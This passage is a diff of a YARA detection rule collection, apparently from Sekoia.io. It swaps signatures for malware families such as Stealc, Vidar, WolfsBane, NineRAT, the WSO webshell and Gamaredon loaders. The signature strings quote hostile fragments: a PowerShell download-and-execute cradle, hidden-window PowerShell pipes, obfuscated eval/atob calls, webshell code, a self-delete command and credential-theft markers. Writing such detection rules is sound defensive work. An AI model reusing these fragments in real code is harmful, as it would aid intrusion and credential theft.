-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_hta_loader.yar#L1-L18"
+		reference = "https://www.softether.org/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/vpn_mul_softether.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
-		logic_hash = "494331a8088d350e4e49e67fe64041d451886e501775413f908bd9b3faa98aeb"
-		score = 65
+		logic_hash = "f93e838631518590e518f29557c60a40734da30b62c056f8ebb8febed389551b"
+		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<HEAD><HTA:APPLICATION ID" ascii fullword
-		$ = "id=service>null</span" ascii fullword
-		$ = "script Language=\"VBScript.Encode" ascii fullword
+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\softether_se%s"
+		$ = "GET /vgc_download_dat/ HTTP/1.1"
+		$ = "http://x%c.x%c.client.api.vpngate2.jp/api/"
+		$ = "http://x0.x0.client.api.vpngate2.jp/check/check.txt"
+		$ = "https://x%c.x%c.statistics.api.vpngate2.jp/api/statistics/"
+		$ = "Software\\SoftEther Project\\SoftEther VPN\\"
+		$ = "|vpnsetup_nosign.exe" wide
+		$ = "/ISEASYINSTALLER:%u" wide
+		$ = "/CALLERSFXPATH:\"%s\"" wide
+		$ = "vpn_client.config" wide
+		$ = "vpn_bridge.config" wide
+		$ = "|backup_dir_readme.txt" wide
+		$ = "vpn_debuginfo_%04u%02u%02u_%02u%02u%02u.zip" wide
 
 	condition:
-		2 of them
+		8 of them
 }
-rule SEKOIA_Apt_Gelsemium_Wolfsbane_Rootkit : FILE
+
+rule SEKOIA_Latrodectus_Exports : FILE
 {
 	meta:
-		description = "Detects Gelsemium's WolfsBane rootkit"
+		description = "detection based on the exports"
 		author = "Sekoia.io"
-		id = "e93f4515-62f5-4057-a464-aae11cbe0639"
-		date = "2024-11-22"
+		id = "29076cf5-f391-42f2-918f-e1c929bd368d"
+		date = "2024-07-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_wolfsbane_rootkit.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/latrodectus_exports.yar#L3-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "ba08e63ad65a9bdcdb1655f25d32c808"
-		logic_hash = "a7440e1b4c0bbff0d80d7152e3bfb0867abe9b0151b45f88aa656f3c9a55b303"
+		logic_hash = "01385f31b1f2fc94453a2ead136a1f7fb253a72bee95f74d755acfa97abdb26d"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "__non_hooked_symbols"
-		$ = "__hidden_literals"
-		$ = "extract_type_2_socket_inode2"
-		$ = "/proc/%s/fd"
-		$ = "pluginkey" wide
-		$ = "mainpath" wide
-		$ = "hiderpath" wide
-
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		(pe.exports ( "stow" ) or pe.exports ( "homq" ) or pe.exports ( "scub" ) ) and pe.number_of_exports >= 3 and uint16( 0 ) == 0x5a4d
 }
-
-rule SEKOIA_Dropper_Win_Ninerat
+rule SEKOIA_Tool_Scanline_Strings : FILE
 {
 	meta:
-		description = "NineRAT dropper"
+		description = "Detects scanline (non-packed)"
 		author = "Sekoia.io"
-		id = "798e3bee-4cee-4647-abda-3c3dcc602f0a"
-		date = "2023-12-12"
+		id = "65677b81-d077-4d01-8398-cbb06ce49edf"
+		date = "2024-09-06"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_win_ninerat.yar#L4-L41"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_scanline_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "00f69545c7351fba8b45e2b4d21855ba8ae94f2d10df199732665e8f3f00c1b4"
+		logic_hash = "e02ae30451aa5eaffb588e92ecc221bf6ed07097bc493c6a55cf688da8b76151"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433"
-		hash2 = "f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59"
 
 	strings:
-		$ = "\\x64\\Release\\Dropper.pdb"
-		$ = "TelegramRat\\lastest\\Dropper"
+		$ = "Resolve IP addresses to hostnames"
+		$ = "Randomize IP and port scan order"
+		$ = "?bhijnprsT"
+		$ = "sl -bht"
 
 	condition:
-		all of them or pe.imphash ( ) == "92b8e9dea06fd5719e29a510e95b92ac" or hash.md5 ( pe.rich_signature.clear_data ) == "ba1ea20fe779ef0b747e5073c0881a99" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c0471e0a78eef692b567cd89eeaddf08" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "965dc8b7c98325ca3d3371ced8424823" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "bae1db350e313bf7bbd3b2178b20e6f6dd9b0331780099374edae5a99625bc5b" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "1abb447513b4435837029933e722b6ed92222291571a8ce0a306c9f6a335aa19" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ffbcd5bbe6c02aa5c993886811d7597f020abd6665fc82af133c5756ab72fb0a" )
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-
-rule SEKOIA_Downloader_Win_Fake_Tor_Browser
+rule SEKOIA_Builder_Win_Royalroad_Rtf : FILE
 {
 	meta:
-		description = "Detect fake TOR browser used to spy Chinese TOR users"
+		description = "Detects RoyalRoad weaponized RTF documents"
 		author = "Sekoia.io"
-		id = "6b070ba6-490b-43c2-9a01-65812d829eeb"
-		date = "2022-10-05"
+		id = "065e798b-eadd-4aac-a444-de61b75f0273"
+		date = "2022-06-23"
 		modified = "2024-12-19"
-		reference = "https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_fake_tor_browser.yar#L4-L18"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/builder_win_royalroad_rtf.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5fe60673e54a6904f4fd068b04b950b895b18e7766d2e7343eae2b1bba9591f9"
+		logic_hash = "831962105248e33422344d1431b90f2b567439b54252668f9294ea388f405b41"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "{\\object\\objocx{\\objdata"
+		$ = "ods0000"
+
 	condition:
-		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7172f95f934574be95c0250fb42b8f51" )
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SEKOIA_Webshell_Wso_Webshell_Strings
+rule SEKOIA_Downloader_Win_Newsterminal : FILE
 {
 	meta:
-		description = "Detects the WSO webshells"
+		description = "Detect the PowerShell based downloader used by APT42 called NEWSTERMINAL"
 		author = "Sekoia.io"
-		id = "84340792-73a4-4d61-9957-6cfa1f6444a7"
-		date = "2022-04-22"
+		id = "2f9aae45-e3bd-4d87-b336-5d141738952b"
+		date = "2024-08-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/webshell_wso_webshell_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_newsterminal.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4d6966a34dc8e7390913857144da106affea14668d1c2c11a05be62a6e625c8f"
+		hash = "2b756515400d7e3b6e21ee3a83f313c8"
+		logic_hash = "45c6c2b5b3723bf3ed46c82e6a254547d8c8b3446bb2fa4b4f0fc8441731ae7e"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 78
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "decrypt($str,$pwd){$pwd=base64_encode($pwd);"
-		$ = "prototype(md5($_SERVER['HTTP_HOST'])"
-		$ = "$_COOKIE[md5($_SERVER['HTTP_HOST'])."
-		$ = "set(a,c,p1,p2,p3,charset)"
-		$ = "(($p & 0x0008) ? (($p & 0x0400)"
-		$ = "gcc','lcc','cc','ld','make','php"
+		$ = "Start-Process -FilePath $takeownCommand -ArgumentList $takeownArgs -Wait -NoNewWindow"
+		$ = "function Download-And-Extract-Dll {"
+		$ = {24 69 63 61 63 6C 73 41 72 67 73 20 3D 20 24 64 65 73 74 69 6E 61 74 69 6F 6E 46 69 6C 65 50 61 74 68 2C 20 22 2F 67 72 61 6E 74 22 2C 20 22 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 73 3A 46 22 2C 20 22 2F 63 22 2C 20 22 2F 71 22}
+		$ = "$publicip=(iwr http://127.0.0.1:4040/api/tunnels"
 
 	condition:
-		3 of them
+		1 of them and filesize < 30KB
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Clean : FILE
+rule SEKOIA_Trojan_Android_Cerberus : FILE
 {
 	meta:
-		description = "Detects clean version of PowerShower"
+		description = "Detect samples of the Android banking trojan Cerberus, or its family"
 		author = "Sekoia.io"
-		id = "4a7c37df-3f53-4190-a86f-94bba3df628e"
-		date = "2022-12-05"
+		id = "3ea398bd-a80c-40f4-ad52-73b528add4ad"
+		date = "2022-01-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_clean.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_android_cerberus.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "24ea6ec0cd8dbcebdf7e42dbd48319562d8682fefd5d0d464a3a5c4b90be40f3"
+		logic_hash = "18109733d15c994015646e786a7c6177a1209200fd4c80042db3d48c97c02030"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257667,27 +257823,30 @@ rule SEKOIA_Apt_Cloudatlas_Powershower_Clean : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[io.file]::WriteAllBytes($zipfile" ascii wide
-		$ = "System.IO.File]::Exists($p_t" ascii wide
-		$ = "HttpRequestP" ascii wide
-		$ = "$http_request.getOption(2)" ascii wide
-		$ = "HttpRequestP($url)" ascii wide
+		$str0 = "assets/neurax.txt"
+		$str1 = "assets/Card_UpPotency_UI.json"
+		$str2 = "assets/Card_SignetFoster_UI.json"
+		$str3 = "assets/Gene_EmpathyTrainer.png"
+		$bin0 = "assets/180417.bin"
+		$bin1 = "assets/180513.bin"
+		$bin2 = "assets/180527.bin"
+		$bin3 = "assets/180528.bin"
 
 	condition:
-		uint8( 0 ) == 0x24 and filesize < 4000 and 4 of them
+		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and 3 of ( $str* ) and 3 of ( $bin* )
 }
-rule SEKOIA_Apt_Gamaredon_Lnk : FILE
+rule SEKOIA_Infostealer_Win_Stealc_Str_Oct24 : FILE
 {
 	meta:
-		description = "Detects lnk file used by Gamaredon"
+		description = "Finds Stealc standalone samples (or dumps) based on the strings"
 		author = "Sekoia.io"
-		id = "bfa69d84-433c-4f37-93b7-5b1b11677fbb"
-		date = "2024-02-08"
+		id = "7448fafe-206c-4f9c-b5a3-cbabec12a45b"
+		date = "2024-10-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_lnk.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_stealc_str_oct24.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "be73ffca4b88f11e33532cf9a179743508bfa7a60c6f4de98c245b350b5fb910"
+		logic_hash = "4f7fece81c3fe1e56b57aed4030b48331b53443a200799046fe84c895b591a71"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257695,54 +257854,72 @@ rule SEKOIA_Apt_Gamaredon_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "-windowstyle hidden $(gc " wide
-		$s2 = "|out-string)|powershell -noprofile -" wide
+		$str01 = "-nop -c \"iex(New-Object Net.WebClient).DownloadString(" ascii
+		$str02 = "Azure\\.IdentityService" ascii
+		$str03 = "steam_tokens.txt" ascii
+		$str04 = "\"encrypted_key\":\"" ascii
+		$str05 = "prefs.js" ascii
+		$str06 = "browser: FileZilla" ascii
+		$str07 = "profile: null" ascii
+		$str08 = "url:" ascii
+		$str09 = "login:" ascii
+		$str10 = "password:" ascii
+		$str11 = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" ascii
+		$str12 = "ChromeFuckNewCookies" ascii
+		$str13 = "/c timeout /t 10 & del /f /q \"" ascii
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and any of them and filesize < 100KB
+		uint16( 0 ) == 0x5A4D and 9 of them
 }
-
-rule SEKOIA_Apt_Lazarus_Gopuram_Backdoor : FILE
+rule SEKOIA_Infostealer_Win_Vidar_Str_Jul22 : FILE
 {
 	meta:
-		description = "Detects Gopuram Backdoor"
+		description = "Detect the Vidar infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "947d4ee3-79fa-450b-8482-beafe607baae"
-		date = "2023-04-04"
+		id = "1dc18694-aaac-41e6-979a-c06d5d62f5ea"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_gopuram_backdoor.yar#L3-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_vidar_str_jul22.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c019b65d28a7b0edf408a1a159a7535e7e14593bbd42c8df3201108ed02f96c0"
+		logic_hash = "394d148155d46753df188a252678c5ce9d0aa321da8907e74b844d5aa8494a47"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2022-08-23"
 		classification = "TLP:CLEAR"
-		hash1 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
-		hash2 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
 
 	strings:
-		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-ms"
-		$xop = {D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE}
-		$opa1 = {48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 ??}
-		$opa2 = {48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ??}
+		$str01 = "vcruntime140.dll" ascii
+		$str02 = "\\screenshot.jpg" ascii
+		$str03 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor" ascii
+		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" ascii
+		$str05 = "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb" ascii
+		$str06 = "\\CC\\%s_%s.txt" ascii
+		$str07 = "\\Autofill\\%s_%s.txt" ascii
+		$str08 = "\\History\\%s_%s.txt" ascii
+		$str09 = "\\Downloads\\%s_%s.txt" ascii
+		$str10 = "Content-Disposition: form-data; name=" ascii
+		$str11 = "Exodus\\exodus.wallet" ascii
+		$str12 = "*%DRIVE_REMOVABLE%*" ascii
+		$opc = {55 8b ec 51 56 8b 75 ?? 33 c0 c7 46 14 ?? ?? ?? ?? 89 46 ?? 68 ?? ?? ?? ?? 8b ce 89 45 ?? 88 06 e8 1f b6 ff ff 8b c6 5e c9 c2 ?? ??}
 
 	condition:
-		( uint16( 0 ) == 0x4d5a and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
+		uint16( 0 ) == 0x5A4D and ( 7 of them or $opc )
 }
-rule SEKOIA_Tool_Printnotifypotato : FILE
+rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Gamaredon HTMLSmuggling attachment"
 		author = "Sekoia.io"
-		id = "8dde175f-025a-4c27-bcc6-d0016dd7238c"
-		date = "2023-08-23"
+		id = "a39b6e67-9327-4c5b-902a-b9853cfefc8e"
+		date = "2023-01-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_printnotifypotato.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_htmlsmuggling_attachment.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5d4b7d1582c2b3f53ca5e1ff6e7ff97a677fe8870e94415f7328ea0a0387049c"
+		logic_hash = "e13da493404b27ef0c026ca32accbb30792981e810c099d633f5de225e241b4d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257750,30 +257927,26 @@ rule SEKOIA_Tool_Printnotifypotato : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "PrintNotifyPotato.exe" ascii wide
-		$s2 = "BeichenDream" ascii wide
-		$s3 = "interactive" ascii wide
-		$s4 = "DuplicateTokenEx" ascii wide
-		$s5 = "CurrentUser" ascii wide
-		$s6 = "FakeIUnknown" ascii wide
+		$ = "['at'+'ob'](" ascii
+		$ = "['ev'+'al'](" ascii
+		$ = "document.querySelectorAll('[" ascii
+		$ = "[0].innerHTML.split(' ').join('')))" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		filesize < 1MB and 2 of them
 }
-rule SEKOIA_Unk_Quad7_Updtae_Reverse_Shell_Strings : FILE
+rule SEKOIA_Infostealer_Win_Nosu : FILE
 {
 	meta:
-		description = "Reverse shell used by Quad7 operators"
+		description = "Finds Nosu samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "02d5394e-734c-4744-b293-1bf96bf1518c"
-		date = "2024-08-19"
+		id = "9823af25-e30b-4514-a59c-02dd19fe368d"
+		date = "2022-12-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unk_quad7_updtae_reverse_shell_strings.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_nosu.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "40b5ac87ff87634c48fdd2cf64ccb66b"
-		hash = "4b8e97260d9ef6ca774675be682d9c8c"
-		logic_hash = "0e816716d4d7fd35617b1ac96ae99d68d5b96f64f8bef83d0f6aba2a3fbd9326"
+		logic_hash = "f18db2008aa9175fc423133fd6d5872c5750d011aad73c373505347443d5032c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257781,29 +257954,26 @@ rule SEKOIA_Unk_Quad7_Updtae_Reverse_Shell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "User-Agent: IOT"
-		$ = "/iot/post"
-		$ = "vender"
-		$ = "Response:  %s"
-		$ = "cmdNum"
-		$ = "UPDTAE"
-		$ = "cmdResult"
+		$str0 = "C:\\xampp\\htdocs\\nosu\\core\\release\\lilly.pdb" ascii
+		$str1 = "{\"gp\":\"%s\",\"app\":\"%S\"," ascii
+		$str2 = "stored in zip:\\%s" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 4 of them
+		uint16( 0 ) == 0x5A4D and 1 of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Apt41_Keyplug_Dropper : FILE
+rule SEKOIA_Apt_Aptc60_Downloader_Strings : FILE
 {
 	meta:
-		description = "Detects a dropper used by keyplug"
+		description = "Detects a simple downloader abusing wlrmdr.exe and used by APT-C-60"
 		author = "Sekoia.io"
-		id = "b6740371-c4c3-437e-8235-0bd4f7b9c3f5"
-		date = "2024-06-12"
+		id = "02fd6d5b-7211-46cc-bcff-ab5d78e459c0"
+		date = "2024-09-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt41_keyplug_dropper.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptc60_downloader_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a61f57302d8fe58ed8b77542c94159acbc36a3bd52c204171e76e668d10a74e7"
+		hash = "b14ef85a60ac71c669cc960bdf580144"
+		logic_hash = "f05480834e6d91a852a190a2ecec05aaea1affa8a605a56c80962a9fbfc8f0c0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257811,26 +257981,26 @@ rule SEKOIA_Apt_Apt41_Keyplug_Dropper : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "C:\\ProgramData\\pfm.ico" wide
-		$ = "C:\\\\ProgramData\\\\pfm.ico" wide
-		$ = "67f8de349abc5ghi" wide
-		$ = "3abc64597f8diegh" wide
+		$ = "mydllmain" fullword
+		$ = "-s 3600 -f 0 -t _ -m _ -a 11 -u" wide
+		$ = "WlrMakeService" wide
+		$ = "Trigger1" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and any of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
 }
-rule SEKOIA_Generic_Tor_Hidden_Service_Leading_To_Winports : FILE
+rule SEKOIA_Apt_Oilrig_Clipog_Strings : FILE
 {
 	meta:
-		description = "Detects malicious TOR redirection affecting RDP, NetBios"
+		description = "Detects OilRig's Clipog stealer"
 		author = "Sekoia.io"
-		id = "1e5c469b-f721-44af-87b3-1adf423719c1"
-		date = "2023-09-07"
+		id = "0ac40fd9-f67d-41fa-a774-77a3a1b7cac3"
+		date = "2023-10-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_tor_hidden_service_leading_to_winports.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_clipog_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "39db199ba7fede8df4bdb505b071240dda96b74f66f818f90047dad338dc4a72"
+		logic_hash = "16f3fef59db9c58025a4a977de944b628e9dc850f87c1bb22e2f2f97601e5107"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257838,27 +258008,27 @@ rule SEKOIA_Generic_Tor_Hidden_Service_Leading_To_Winports : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "HiddenServiceDir "
-		$s2 = "SocksPort "
-		$s3 = "HiddenServicePort "
-		$s4 = ":3389"
-		$s5 = ":445"
+		$ = "[ClipBoard=" wide
+		$ = "[NUMPAD .]" wide
+		$ = "[SPACE]" wide
+		$ = "GetClipboardData"
 
 	condition:
-		$s1 and $s2 and ( $s4 in ( @s3 .. @s3 + 100 ) or $s5 in ( @s3 .. @s3 + 100 ) ) and filesize < 2000
+		uint16be( 0 ) == 0x4d5a and filesize < 350KB and all of them
 }
-rule SEKOIA_Infostealer_Win_Fwit_Strings : FILE
+rule SEKOIA_Tool_Nssm_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects nssm tool"
 		author = "Sekoia.io"
-		id = "332e89ad-d1fe-4da6-9354-0978ef173e78"
-		date = "2023-06-22"
+		id = "fab99d44-6494-4bfc-80c0-67c45bad0425"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_fwit_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_nssm_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4e28b6d67e2087b2f28817b19812b8bd56227175cd3d9c7037290127d4ec05a5"
+		hash = "beceae2fdc4f7729a93e94ac2ccd78cc"
+		logic_hash = "ca883f3ed9f510cbcd9b96ad167e9d6725341c311b023f22edcba721e801f07d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257866,25 +258036,27 @@ rule SEKOIA_Infostealer_Win_Fwit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:\\ProgramData\\Temp" wide
-		$s2 = "{:08x}" wide
-		$s3 = "CURL_SSLVERSION" ascii
+		$ = "nssm start <servicename>" wide
+		$ = "nssm stop <servicename>" wide
+		$ = "nssm restart <servicename>" wide
+		$ = "nssm status <servicename>" wide
+		$ = "nssm rotate <servicename>" wide
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and all of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
 }
-rule SEKOIA_Hacktool_Mimilite : FILE
+rule SEKOIA_Hacktool_Earthworm_Strings : FILE
 {
 	meta:
-		description = "Detects Mimilite"
+		description = "Detects Mac/Win/Linux EarthWorm based on strings"
 		author = "Sekoia.io"
-		id = "abb92a9d-0978-4ef2-b2cc-53ce6e83e3e4"
